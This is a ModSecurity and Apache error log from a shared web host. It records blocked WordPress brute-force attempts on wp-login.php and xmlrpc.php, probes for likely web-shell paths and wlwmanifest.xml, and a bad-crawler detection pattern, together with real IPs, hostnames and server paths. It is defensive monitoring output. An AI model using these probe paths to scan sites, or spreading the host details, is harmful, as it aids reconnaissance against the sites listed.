[Tue May 26 18:36:55.220257 2026] [security2:error] [pid 1015481:tid 1015737] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa7rQIKfWDMlp2INdARAAAAYg"]
[Tue May 26 18:36:56.753653 2026] [security2:error] [pid 1015481:tid 1015625] [client 74.249.212.138:12151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWa8LQIKfWDMlp2INdAcQAAARg"]
[Tue May 26 18:36:57.839567 2026] [security2:error] [pid 1015481:tid 1015711] [client 74.249.212.138:20853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-admin/js/"] [unique_id "ahWa8bQIKfWDMlp2INdAjgAAAW4"]
[Tue May 26 18:36:58.006493 2026] [security2:error] [pid 1015481:tid 1015700] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa8bQIKfWDMlp2INdAhwAAAWM"]
[Tue May 26 18:36:58.111822 2026] [security2:error] [pid 1015481:tid 1015666] [client 74.249.212.138:12151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWa8rQIKfWDMlp2INdAlgAAAUE"]
[Tue May 26 18:36:58.209350 2026] [security2:error] [pid 1015481:tid 1015686] [client 74.249.212.138:20853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWa8rQIKfWDMlp2INdAlwAAAVU"]
[Tue May 26 18:36:58.209482 2026] [security2:error] [pid 1015481:tid 1015686] [client 74.249.212.138:20853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWa8rQIKfWDMlp2INdAlwAAAVU"]
[Tue May 26 18:36:58.745619 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:58434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa8rQIKfWDMlp2INdAowAAATc"]
[Tue May 26 18:36:58.745764 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:58434] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa8rQIKfWDMlp2INdAowAAATc"]
[Tue May 26 18:36:59.993690 2026] [security2:error] [pid 1015481:tid 1015718] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa87QIKfWDMlp2INdAtAAAAXU"]
[Tue May 26 18:37:03.381561 2026] [security2:error] [pid 1015481:tid 1015659] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa9rQIKfWDMlp2INdA-QAAATo"]
[Tue May 26 18:37:03.410900 2026] [security2:error] [pid 1015481:tid 1015505] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa97QIKfWDMlp2INdA_QABUhc"]
[Tue May 26 18:37:03.411099 2026] [security2:error] [pid 1015481:tid 1015683] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa97QIKfWDMlp2INdA_QABUhc"]
[Tue May 26 18:37:03.647620 2026] [security2:error] [pid 1015481:tid 1015508] [remote 46.62.185.67:57102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWa97QIKfWDMlp2INdA_gABXho"]
[Tue May 26 18:37:04.385491 2026] [security2:error] [pid 1015481:tid 1015725] [client 74.249.212.138:13238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/half.php"] [unique_id "ahWa-LQIKfWDMlp2INdBDwAAAXw"]
[Tue May 26 18:37:04.385642 2026] [security2:error] [pid 1015481:tid 1015725] [client 74.249.212.138:13238] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/half.php"] [unique_id "ahWa-LQIKfWDMlp2INdBDwAAAXw"]
[Tue May 26 18:37:06.050572 2026] [security2:error] [pid 1015481:tid 1015692] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa-bQIKfWDMlp2INdBLgAAAVs"]
[Tue May 26 18:37:06.510315 2026] [security2:error] [pid 1015481:tid 1015635] [client 85.208.96.195:65334] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWa-rQIKfWDMlp2INdBSAAAASI"]
[Tue May 26 18:37:06.510437 2026] [security2:error] [pid 1015481:tid 1015635] [client 85.208.96.195:65334] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWa-rQIKfWDMlp2INdBSAAAASI"]
[Tue May 26 18:37:07.459025 2026] [security2:error] [pid 1015481:tid 1015623] [client 62.60.130.228:64136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWa-7QIKfWDMlp2INdBWAAAARY"], referer: https://www.bing.com/
[Tue May 26 18:37:07.520760 2026] [security2:error] [pid 1015481:tid 1015656] [client 149.20.246.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa-7QIKfWDMlp2INdBYQAAATc"], referer: http://anujtradingco.com/
[Tue May 26 18:37:07.788742 2026] [security2:error] [pid 1015481:tid 1015691] [client 62.60.130.228:60252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWa-7QIKfWDMlp2INdBagAAAVo"], referer: https://www.facebook.com/
[Tue May 26 18:37:09.308089 2026] [security2:error] [pid 1015481:tid 1015621] [client 124.43.5.103:21203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa_bQIKfWDMlp2INdBlgAAARQ"]
[Tue May 26 18:37:09.308228 2026] [security2:error] [pid 1015481:tid 1015621] [client 124.43.5.103:21203] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa_bQIKfWDMlp2INdBlgAAARQ"]
[Tue May 26 18:37:09.357873 2026] [security2:error] [pid 1015481:tid 1015613] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa_LQIKfWDMlp2INdBjwAAAQw"]
[Tue May 26 18:37:09.519237 2026] [security2:error] [pid 1015481:tid 1015666] [client 62.60.130.228:52080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWa_bQIKfWDMlp2INdBwAAAAUE"], referer: https://www.google.com/
[Tue May 26 18:37:10.904770 2026] [security2:error] [pid 1015481:tid 1015655] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa_rQIKfWDMlp2INdB6gAAATY"]
[Tue May 26 18:37:11.970036 2026] [security2:error] [pid 1015481:tid 1015656] [client 149.20.246.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa_7QIKfWDMlp2INdCJgAAATc"], referer: https://anujtradingco.com/
[Tue May 26 18:37:13.808767 2026] [autoindex:error] [pid 1015481:tid 1015689] [client 160.187.108.15:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:37:14.378886 2026] [security2:error] [pid 1015481:tid 1015492] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbArQIKfWDMlp2INdCUAABcAo"]
[Tue May 26 18:37:14.379216 2026] [security2:error] [pid 1015481:tid 1015713] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbArQIKfWDMlp2INdCUAABcAo"]
[Tue May 26 18:37:14.758098 2026] [security2:error] [pid 1015481:tid 1015730] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbArQIKfWDMlp2INdCWgAAAYE"]
[Tue May 26 18:37:15.451897 2026] [security2:error] [pid 1015481:tid 1015646] [client 66.249.64.163:57468] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWbArQIKfWDMlp2INdCVAAAAS0"], referer: http://doyecpa.com/prizes/46866975%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 18:37:16.551672 2026] [security2:error] [pid 1015481:tid 1015631] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbBLQIKfWDMlp2INdCfgAAAR4"]
[Tue May 26 18:37:16.608955 2026] [security2:error] [pid 1015481:tid 1015502] [remote 194.163.139.224:49286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbBLQIKfWDMlp2INdCgwABbxQ"]
[Tue May 26 18:37:16.857088 2026] [security2:error] [pid 1015481:tid 1015506] [remote 194.163.139.224:49286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbBLQIKfWDMlp2INdCkAABdxg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:37:17.192144 2026] [autoindex:error] [pid 1015481:tid 1015723] [client 136.111.128.5:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:37:17.268692 2026] [core:error] [pid 1015481:tid 1015727] [client 136.111.128.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:37:17.268709 2026] [core:error] [pid 1015481:tid 1015727] [client 136.111.128.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:37:17.336000 2026] [security2:error] [pid 1015481:tid 1015509] [remote 209.42.19.17:43710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWbBbQIKfWDMlp2INdCoAABMRs"]
[Tue May 26 18:37:17.460370 2026] [core:error] [pid 1015481:tid 1015701] [client 136.111.128.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:37:17.460388 2026] [core:error] [pid 1015481:tid 1015701] [client 136.111.128.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:37:17.831796 2026] [security2:error] [pid 1015481:tid 1015672] [client 136.111.128.5:63162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.128.111.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/xmlrpc.php"] [unique_id "ahWbBbQIKfWDMlp2INdCswAAAUc"]
[Tue May 26 18:37:18.122192 2026] [security2:error] [pid 1015481:tid 1015629] [client 136.111.128.5:62852] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWbBrQIKfWDMlp2INdCvgAAARw"]
[Tue May 26 18:37:18.299928 2026] [security2:error] [pid 1015481:tid 1015614] [client 136.111.128.5:60729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWbBrQIKfWDMlp2INdCyAAAAQ0"]
[Tue May 26 18:37:18.485180 2026] [security2:error] [pid 1015481:tid 1015617] [client 136.111.128.5:57213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWbBrQIKfWDMlp2INdCygAAARA"]
[Tue May 26 18:37:18.698915 2026] [security2:error] [pid 1015481:tid 1015700] [client 136.111.128.5:56545] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWbBrQIKfWDMlp2INdC0QAAAWM"]
[Tue May 26 18:37:18.844664 2026] [security2:error] [pid 1015481:tid 1015721] [client 136.111.128.5:49823] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWbBrQIKfWDMlp2INdC1AAAAXg"]
[Tue May 26 18:37:19.008094 2026] [security2:error] [pid 1015481:tid 1015656] [client 136.111.128.5:57744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWbB7QIKfWDMlp2INdC2wAAATc"]
[Tue May 26 18:37:19.172549 2026] [security2:error] [pid 1015481:tid 1015728] [client 136.111.128.5:57139] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWbB7QIKfWDMlp2INdC4gAAAX8"]
[Tue May 26 18:37:19.287239 2026] [security2:error] [pid 1015481:tid 1015737] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbBrQIKfWDMlp2INdC1wAAAYg"]
[Tue May 26 18:37:19.339952 2026] [security2:error] [pid 1015481:tid 1015645] [client 136.111.128.5:63211] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWbB7QIKfWDMlp2INdC5AAAASw"]
[Tue May 26 18:37:19.487715 2026] [security2:error] [pid 1015481:tid 1015729] [client 136.111.128.5:56476] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWbB7QIKfWDMlp2INdC5QAAAYA"]
[Tue May 26 18:37:19.702343 2026] [security2:error] [pid 1015481:tid 1015667] [client 136.111.128.5:53044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWbB7QIKfWDMlp2INdC7QAAAUI"]
[Tue May 26 18:37:20.350173 2026] [security2:error] [pid 1015481:tid 1015665] [client 124.43.5.103:59120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbCLQIKfWDMlp2INdC-AAAAUA"]
[Tue May 26 18:37:20.350341 2026] [security2:error] [pid 1015481:tid 1015665] [client 124.43.5.103:59120] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbCLQIKfWDMlp2INdC-AAAAUA"]
[Tue May 26 18:37:20.526076 2026] [security2:error] [pid 1015481:tid 1015510] [remote 3.208.180.187:59016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWbCLQIKfWDMlp2INdC-wABZRw"]
[Tue May 26 18:37:21.014845 2026] [security2:error] [pid 1015481:tid 1015698] [client 66.249.66.66:53850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.jhonparra.com"] [uri "/index.php"] [unique_id "ahWbCLQIKfWDMlp2INdDAAAAAWE"]
[Tue May 26 18:37:22.019004 2026] [security2:error] [pid 1015481:tid 1015624] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbCbQIKfWDMlp2INdDHQAAARc"]
[Tue May 26 18:37:22.474322 2026] [security2:error] [pid 1015481:tid 1015537] [remote 52.18.195.140:45708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWbCrQIKfWDMlp2INdDLgABeTc"]
[Tue May 26 18:37:22.783318 2026] [security2:error] [pid 1015481:tid 1015540] [remote 52.18.195.140:45708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWbCrQIKfWDMlp2INdDOAABEDo"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 18:37:23.153440 2026] [security2:error] [pid 1015481:tid 1015541] [remote 208.68.37.246:44562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.37.68.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWbCrQIKfWDMlp2INdDPAABhDs"]
[Tue May 26 18:37:24.729143 2026] [security2:error] [pid 1015481:tid 1015534] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbDLQIKfWDMlp2INdDbQABDTQ"]
[Tue May 26 18:37:24.729320 2026] [security2:error] [pid 1015481:tid 1015614] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbDLQIKfWDMlp2INdDbQABDTQ"]
